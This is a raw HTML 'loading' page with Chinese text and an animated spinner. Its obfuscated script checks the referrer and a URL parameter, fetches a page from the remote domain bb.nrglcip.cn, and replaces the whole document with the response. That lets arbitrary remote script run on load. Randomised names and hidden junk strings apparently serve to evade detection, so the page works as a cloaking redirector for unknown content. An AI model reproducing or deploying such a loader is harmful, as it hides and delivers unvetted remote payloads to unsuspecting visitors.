<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YKQlpI0AYBn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YKQlpI0AYBn .gZJmgswK {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YKQlpI0AYBn .content {
            line-height: 50px;
            text-align: center
        }

        .YKQlpI0AYBn .img {
            width: 100%
        }

        .YKQlpI0AYBn .xCxNyvqbDZF {
            text-align: center
        }

        .YKQlpI0AYBn .xCxNyvqbDZF span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YKQlpI0AYBn .xCxNyvqbDZF span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YKQlpI0AYBn .xCxNyvqbDZF span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YKQlpI0AYBn .xCxNyvqbDZF span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YKQlpI0AYBn .xCxNyvqbDZF span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YKQlpI0AYBn .xCxNyvqbDZF span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YKQlpI0AYBn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kmgSdXqozpsf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jbJfHg = kmgSdXqozpsf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jbJfHg +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jbJfHg +".html?a=share";
		}
		
        XCHFUTc=url+"#"+new Date().getTime();
        XCHFUTc && function() {
            $.get(XCHFUTc, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >YZiO3cWHPlDAtQgeNo62AF0A9O5duEI</b>
<div style='display:none'>Lh6wV8069PDvNOFTQgID0R3NMUv</div>
<li style='display:none' >fI6vZBTHAAAQnH9hQKODuiXmnoBYDgYFSSRWPsPXkXmAm3W8JxDSi9tmOnnrPKUDWlcvaygwnBNbVCTbvzC1C61nv6RH4wucQ3Nt</li>
<span style='display:none'>xu0r7lcx7kmshUYAHntAUuMxNacLUzcF0</span>
<div style='display:none'>Lh6wV8069PDvNOFTQgID0R3NMUv</div><div class="YKQlpI0AYBn">
    <div class="gZJmgswK">
        <div class="xCxNyvqbDZF">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>QTU1BYHKAwWBLRp4cWm4dwjyJD</span>
<span style='display:none'>QTU1BYHKAwWBLRp4cWm4dwjyJD</span>
<img  src='' style='display:none'>
<ul style='display:none' >C6VOxUriYbWtrWcTK9es2dyiB1LZvYnZkWUaS3IJoRP</ul></body>
</html>